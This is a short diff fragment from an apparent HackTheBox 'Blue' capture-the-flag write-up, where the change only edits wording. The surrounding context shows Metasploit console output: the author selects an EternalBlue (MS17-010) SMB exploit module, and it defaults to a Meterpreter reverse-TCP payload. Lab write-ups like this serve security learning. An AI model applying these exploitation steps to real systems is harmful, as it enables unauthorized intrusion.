pierretallotte/ctf-writeups/htb-blue/README.md

 Interact with a module by name or index.
 For example info 3, use 3 or use exploit/windows/smb/smb_doublepulsar_rce
 ```
 Apparently, there are multiple exploits.
-The last one is ranked "great" but it does not talk about EternalBlue or MS17-10 so I prefer to look at the second one:
+The last one is ranked "great" but it does not talk about `EternalBlue` or MS17-10, so I prefer to look at the second one:
 ```
 [msf](Jobs:0 Agents:0) >> use 1
 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp